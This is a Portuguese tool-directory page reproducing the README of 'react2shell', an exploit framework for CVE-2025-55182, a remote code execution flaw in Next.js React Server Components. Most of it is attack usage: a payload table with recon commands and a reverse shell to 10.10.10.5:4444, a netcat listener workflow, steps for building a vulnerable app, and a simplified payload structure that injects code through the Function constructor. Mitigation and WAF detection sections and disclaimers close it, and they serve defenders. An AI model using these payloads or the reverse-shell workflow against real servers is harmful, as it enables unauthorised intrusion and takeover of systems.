Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell — Um framework completo para explorar a vulnerabilidade CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/zr0n/react2shell
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubzr0n/react2shell

react2shell

Um framework completo para explorar a vulnerabilidade CVE-2025-55182

Ver Repositório
1053há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell - PoC do Exploit CVE-2025-55182

Security Platform License

Um exploit de prova de conceito para CVE-2025-55182, uma vulnerabilidade crítica de Execução Remota de Código em aplicações Next.js que usam React Server Components.

⚠️ AVISO

ESTA FERRAMENTA É APENAS PARA TESTES DE SEGURANÇA EDUCACIONAIS E AUTORIZADOS.

  • ❌ NÃO use contra sistemas que você não possui ou sem permissão explícita para testar
  • ❌ Acesso não autorizado a sistemas de computador é ilegal
  • ✅ Use apenas em ambientes controlados para aprendizado e testes de penetração autorizados
  • ✅ O autor não é responsável por uso indevido ou danos causados por esta ferramenta

📋 Detalhes da Vulnerabilidade

  • CVE ID: CVE-2025-55182
  • Vulnerabilidade: Execução Remota de Código em React Server Components
  • Versões Afetadas:
    • Next.js: ≥14.3.0-canary.77, todas as versões 15.x e 16.x com App Router
    • React: 19.0, 19.1.0, 19.1.1, 19.2.0
  • Versões Corrigidas:
    • Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
    • React: 19.0.1, 19.1.2, 19.2.1
  • Pontuação CVSS: Crítica
Baixar ferramenta
  • Vetor de Ataque: Baseado em rede, requer requisição POST maliciosa
  • 🎯 Recursos

    • ✅ Suporte multiplataforma (Windows e Linux)
    • ✅ Múltiplos tipos de payload
    • ✅ Capacidades de reverse shell
    • ✅ Payloads de prova visual (calc, notepad)
    • ✅ Operações de sistema de arquivos
    • ✅ Coleta de informações do sistema

    🔧 Instalação

    root@kitploit:~
    # Clone or download this repository
    git clone https://github.com/zr0n/react2shell
    cd react2shell
    
    # Install dependencies
    npm install form-data
    

    💻 Uso

    Sintaxe Básica

    root@kitploit:~
    node react2shell.js <target_url> <payload_type> [options]
    

    Payloads Disponíveis

    PayloadDescriçãoExemplo
    basicProva de conceito matemática (7*7+1=50)node react2shell.js http://target:3000 basic
    whoamiExibe o usuário atual do sistemanode react2shell.js http://target:3000 whoami
    dirLista o conteúdo do diretório atualnode react2shell.js http://target:3000 dir
    systeminfoExibe informações do sistema operacionalnode react2shell.js http://target:3000 systeminfo
    fileCria arquivo de prova EXPLOITED.txtnode react2shell.js http://target:3000 file
    calcAbre a calculadora (prova visual no Windows)node react2shell.js http://target:3000 calc
    notepadAbre o bloco de notas (prova visual no Windows)node react2shell.js http://target:3000 notepad
    shellReverse shell (detecção automática Windows/Linux)node react2shell.js http://target:3000 shell 10.10.10.5 4444

    Exemplos

    1. Prova de Conceito Básica

    root@kitploit:~
    node react2shell.js http://localhost:3000 basic
    # Check server console for output: EXPLOITED: 50
    

    2. Reconhecimento de Sistema

    root@kitploit:~
    # Get current user
    node react2shell.js http://localhost:3000 whoami
    
    # List files
    node react2shell.js http://localhost:3000 dir
    
    # System information
    node react2shell.js http://localhost:3000 systeminfo
    

    3. Prova Visual (Windows)

    root@kitploit:~
    # Launch calculator
    node react2shell.js http://localhost:3000 calc
    
    # Launch notepad
    node react2shell.js http://localhost:3000 notepad
    

    4. Prova de Criação de Arquivo

    root@kitploit:~
    node react2shell.js http://localhost:3000 file
    # Check server directory for EXPLOITED.txt
    

    5. Reverse Shell

    root@kitploit:~
    # Terminal 1: Start listener
    nc -lvnp 4444
    
    # Terminal 2: Execute exploit
    node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
    
    # Works on both Windows (PowerShell) and Linux (Bash)
    

    🏗️ Configurando Ambiente Vulnerável

    Pré-requisitos

    • Node.js 18+
    • npm ou yarn

    Criar Aplicação Next.js Vulnerável

    root@kitploit:~
    # Create project directory
    mkdir vulnerable-nextjs-app
    cd vulnerable-nextjs-app
    
    # Initialize Next.js with vulnerable version
    npx create-next-app@latest . --ts --app --no-eslint --tailwind
    
    # Downgrade to vulnerable version
    npm install [email protected]
    
    # Install dependencies
    npm install
    

    App Mínimo Vulnerável (app/page.tsx)

    root@kitploit:~
    export default function Home() {
      return (
        <div className="p-8">
          <h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
          <p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
        </div>
      );
    }
    

    Iniciar Servidor

    root@kitploit:~
    npm run dev
    # Server runs on http://localhost:3000
    

    🔍 Como Funciona

    O exploit aproveita uma vulnerabilidade de desserialização em React Server Components:

    1. Construção do Payload: Cria um objeto serializado malicioso com poluição de protótipo
    2. Acesso ao Construtor de Função: Explora constructor.constructor para acessar o construtor de Function
    3. Injeção de Código: Injeta código JavaScript arbitrário por meio do campo _prefix
    4. Execução: O servidor desserializa o payload e executa o código injetado

    Detalhes Técnicos

    root@kitploit:~
    // Simplified vulnerability chain
    {
      _formData: {
        get: '$3:constructor:constructor' // Access Function constructor
      },
      _prefix: 'YOUR_CODE_HERE//' // Injected code
    }
    

    🛡️ Mitigação

    Para Proprietários de Aplicações

    1. Atualize Imediatamente:

      root@kitploit:~
      npm update next@latest
      npm update react@latest react-dom@latest
      
    2. Verifique as Versões Corrigidas:

      root@kitploit:~
      npm list next react
      
    3. Versões Necessárias:

      • Next.js: ≥16.0.7 ou ≥15.5.7
      • React: ≥19.2.1 ou ≥19.1.2

    Para Equipes de Segurança

    • Verifique se há versões vulneráveis do Next.js em sua infraestrutura
    • Implemente regras de Web Application Firewall (WAF) para detectar payloads RSC maliciosos
    • Monitore requisições POST suspeitas com cabeçalhos next-action
    • Revise os logs do lado do servidor para padrões inesperados de execução de código

    📊 Detecção

    Regras de WAF

    Procure por requisições POST com:

    • Cabeçalho: next-action
    • Content-Type: multipart/form-data
    • Corpo contendo: constructor, _prefix, _formData

    Padrões de Log

    root@kitploit:~
    POST / with next-action header
    Suspicious FormData keys: 0, 1, 2, 3, 4
    Response: 200 (successful exploitation) or 500 (failed)
    

    📚 Referências

    • CVE-2025-55182 - NVD
    • Avisos de Segurança do Next.js
    • Atualizações de Segurança do React
    • Injeção de Código (OWASP)

    🤝 Contribuição

    Esta é uma ferramenta educacional. Contribuições que aprimorem:

    • Capacidades de detecção
    • Documentação
    • Estratégias defensivas
    • Conteúdo educacional

    são bem-vindas. NÃO envie contribuições que aprimorem capacidades de ataque.

    📜 Licença

    Apenas para Uso Educacional - Nenhuma garantia fornecida

    👤 Autor

    Luiz Fernando Ziron Criado para fins educacionais e de conscientização em segurança cibernética.

    ⚖️ Aviso Legal

    Ao usar esta ferramenta, você concorda em:

    • Usá-la apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
    • Assumir total responsabilidade por suas ações
    • Não responsabilizar o autor por qualquer uso indevido ou dano
    • Cumprir todas as leis e regulamentos aplicáveis

    Acesso não autorizado a sistemas de computador é crime na maioria das jurisdições.


    Fique seguro, mantenha-se ético, mantenha-se legal. 🔒